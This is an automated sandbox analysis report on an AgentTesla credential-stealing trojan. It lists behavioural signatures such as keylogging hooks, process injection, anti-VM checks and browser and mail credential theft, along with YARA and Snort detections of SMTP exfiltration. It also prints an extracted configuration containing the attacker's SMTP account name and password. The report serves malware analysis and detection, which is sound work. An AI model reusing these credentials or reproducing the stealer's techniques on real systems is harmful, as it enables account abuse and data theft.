Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.19730

Overview

General Information

Sample Name:SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.19730 (renamed file extension from 19730 to exe)
Analysis ID:671761
MD5:dc73208cea7efcb8980e4fe19695fb58
SHA1:2c2dcb6cb0c160be8ed8a44258c75c72490dc800
SHA256:3c9da266bec8653324cc74d991fe6707192843f196ba7a0007d1f2850501b24b
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • cleanup
{"Exfil Mode": "SMTP", "Username": "facturare@rematinvest.ro", "Password": "RyN!2020-", "Host": "mail.rematinvest.ro"}
SourceRuleDescriptionAuthorStrings
00000001.00000000.275647254.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.275647254.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000000.275934725.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000000.275934725.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000001.00000000.275297805.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            1.0.cvtres.exe.400000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.0.cvtres.exe.400000.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                1.0.cvtres.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.0.cvtres.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    1.0.cvtres.exe.400000.3.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                    • 0x327b0:$s10: logins
                    • 0x32217:$s11: credential
                    • 0x2e7dc:$g1: get_Clipboard
                    • 0x2e7ea:$g2: get_Keyboard
                    • 0x2e7f7:$g3: get_Password
                    • 0x2fb06:$g4: get_CtrlKeyDown
                    • 0x2fb16:$g5: get_ShiftKeyDown
                    • 0x2fb27:$g6: get_AltKeyDown
                    Click to see the 19 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.3109.99.162.14497415872030171 07/22/22-15:33:30.362608
                    SID:2030171
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3109.99.162.14497415872840032 07/22/22-15:33:30.362703
                    SID:2840032
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3109.99.162.14497415872851779 07/22/22-15:33:30.362703
                    SID:2851779
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeVirustotal: Detection: 24%Perma Link
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeReversingLabs: Detection: 29%
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeJoe Sandbox ML: detected
                    Source: 1.0.cvtres.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 1.0.cvtres.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                    Source: 1.2.cvtres.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 1.0.cvtres.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 1.0.cvtres.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                    Source: 1.0.cvtres.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 1.0.cvtres.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "facturare@rematinvest.ro", "Password": "RyN!2020-", "Host": "mail.rematinvest.ro"}
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: XAAWWQQRDG243.pdb source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_010DD08C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_010DD0A4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_010DD0BC

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49741 -> 109.99.162.14:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49741 -> 109.99.162.14:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49741 -> 109.99.162.14:587
                    Source: Joe Sandbox ViewASN Name: RTDBucharestRomaniaRO RTDBucharestRomaniaRO
                    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 109.99.162.14:587
                    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 109.99.162.14:587
                    Source: cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://CsSUlW.com
                    Source: cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: cvtres.exe, 00000001.00000002.540696407.00000000071E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.rematinvest.ro
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://ocsp.digicert.com0C
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://ocsp.digicert.com0O
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: cvtres.exe, 00000001.00000002.540696407.00000000071E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rematinvest.ro
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: http://www.digicert.com/CPS0
                    Source: cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: https://www.digicert.com/CPS0
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: mail.rematinvest.ro

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB32AA8 SetWindowsHookExW 0000000D,00000000,?,?1_2_0AB32AA8
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.276816184.0000000000C0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.0.cvtres.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b604F3593u002d6407u002d4C5Du002dBD8Fu002dB15E7C110E68u007d/u003736C013Fu002dA950u002d4972u002d94EBu002d155F6DFC9245.csLarge array initialization: .cctor: array initializer size 11639
                    Source: 1.0.cvtres.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b604F3593u002d6407u002d4C5Du002dBD8Fu002dB15E7C110E68u007d/u003736C013Fu002dA950u002d4972u002d94EBu002d155F6DFC9245.csLarge array initialization: .cctor: array initializer size 11639
                    Source: 1.2.cvtres.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b604F3593u002d6407u002d4C5Du002dBD8Fu002dB15E7C110E68u007d/u003736C013Fu002dA950u002d4972u002d94EBu002d155F6DFC9245.csLarge array initialization: .cctor: array initializer size 11639
                    Source: 1.0.cvtres.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b604F3593u002d6407u002d4C5Du002dBD8Fu002dB15E7C110E68u007d/u003736C013Fu002dA950u002d4972u002d94EBu002d155F6DFC9245.csLarge array initialization: .cctor: array initializer size 11639
                    Source: 1.0.cvtres.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b604F3593u002d6407u002d4C5Du002dBD8Fu002dB15E7C110E68u007d/u003736C013Fu002dA950u002d4972u002d94EBu002d155F6DFC9245.csLarge array initialization: .cctor: array initializer size 11639
                    Source: 1.0.cvtres.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b604F3593u002d6407u002d4C5Du002dBD8Fu002dB15E7C110E68u007d/u003736C013Fu002dA950u002d4972u002d94EBu002d155F6DFC9245.csLarge array initialization: .cctor: array initializer size 11639
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DF5100_2_010DF510
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D71D80_2_010D71D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D04480_2_010D0448
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D30B80_2_010D30B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D3F780_2_010D3F78
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D2BA40_2_010D2BA4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DD3E80_2_010DD3E8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D7BE00_2_010D7BE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DAE800_2_010DAE80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D1E800_2_010D1E80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D26D00_2_010D26D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D12F00_2_010D12F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D717C0_2_010D717C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D61800_2_010D6180
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D61900_2_010D6190
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D65A90_2_010D65A9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D65B80_2_010D65B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D1DE00_2_010D1DE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D11F30_2_010D11F3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D64080_2_010D6408
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D84080_2_010D8408
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D04380_2_010D0438
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D30A80_2_010D30A8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DB3250_2_010DB325
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D6B590_2_010D6B59
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D5F790_2_010D5F79
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D5F880_2_010D5F88
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D6BA80_2_010D6BA8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D5BB90_2_010D5BB9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D83B30_2_010D83B3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D5BC80_2_010D5BC8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D7BD00_2_010D7BD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D83F80_2_010D83F8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D63FB0_2_010D63FB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D12310_2_010D1231
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D9A300_2_010D9A30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D9A400_2_010D9A40
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DAE730_2_010DAE73
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D3E900_2_010D3E90
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DB2C50_2_010DB2C5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010D26C00_2_010D26C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DB2DB0_2_010DB2DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_06F6F3C81_2_06F6F3C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_06F6F0801_2_06F6F080
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_06F6ADD01_2_06F6ADD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_06F661201_2_06F66120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_06F6ADC91_2_06F6ADC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A808E581_2_0A808E58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A80AC581_2_0A80AC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A801D281_2_0A801D28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9ED3541_2_0A9ED354
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9E6F681_2_0A9E6F68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9E19A81_2_0A9E19A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9EF2111_2_0A9EF211
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9EBE401_2_0A9EBE40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9E87D01_2_0A9E87D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9ED3481_2_0A9ED348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9E2CD81_2_0A9E2CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9EE42F1_2_0A9EE42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9E2D881_2_0A9E2D88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9EE5201_2_0A9EE520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A9E95481_2_0A9E9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB3B3141_2_0AB3B314
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.277186233.0000000002A25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoKRqvBDdHrCFXRMUeMYMrqRNhh.exe4 vs SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoKRqvBDdHrCFXRMUeMYMrqRNhh.exe4 vs SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.276585207.0000000000572000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXAAWWQQRDG243.exe< vs SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.276816184.0000000000C0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
